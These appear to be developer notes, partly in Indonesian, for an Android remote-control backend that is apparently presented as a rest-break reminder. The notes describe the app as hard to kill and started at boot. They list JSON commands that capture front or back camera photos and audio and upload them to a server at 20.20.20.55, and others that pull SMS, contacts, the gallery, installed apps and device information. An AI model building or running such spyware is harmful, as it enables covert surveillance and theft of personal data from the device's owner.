 Kirim suara alarm dari backend
 Auto-start saat boot
 Jalankan di background tanpa mudah dimatikan
show_notification	Tampilkan notifikasi ke user (title + message)
show_toast	Tampilkan toast singkat (pop-up bawah layar)
vibrate_device	Getarkan device untuk durasi tertentu

command
#Kirim Notifikasi
{
    "device_id": "98fbff301bd1c6ea",
    "command": "show_notification",
    "params": {
        "title": "Hai",
        "message": "Sudah waktunya istirahat"
    }
}

# take foto 
{
    "device_id": "98fbff301bd1c6ea",
    "command": "take_photo",
    "params": {
        "camera": "front", // atau "back"
        "upload_url": "http://20.20.20.55:8080/api/device/upload_photo?device_id=98fbff301bd1c6ea"
    }
}

# show warning ui 
{
    "device_id": "98fbff301bd1c6ea",
    "command": "show_warning_ui",
    "params": {
        "message": "Sudah waktunya istirahat. Layar akan dikunci dalam 10 detik."
    }
}

get_installed_apps
{
  "device_id": "98fbff301bd1c6ea",
  "command": "get_installed_apps",
  "params": {}
}

upload_gallery
{
  "device_id": "98fbff301bd1c6ea",
  "command": "upload_gallery",
  "params": {}
}

get SMS
{
  "device_id": "98fbff301bd1c6ea",
  "command": "get_sms",
  "params": {}
}

get get_contact
{
  "device_id": "98fbff301bd1c6ea",
  "command": "get_contact",
  "params": {}
}

get_information
{
  "device_id": "98fbff301bd1c6ea",
  "command": "get_information",
  "params": {}
}

record_audio
{
  "device_id": "98fbff301bd1c6ea",
  "command": "record_audio",
  "params": {
    "duration": 10,
    "upload_url": "http://20.20.20.55:8080/api/device/upload_audio"
  }
}
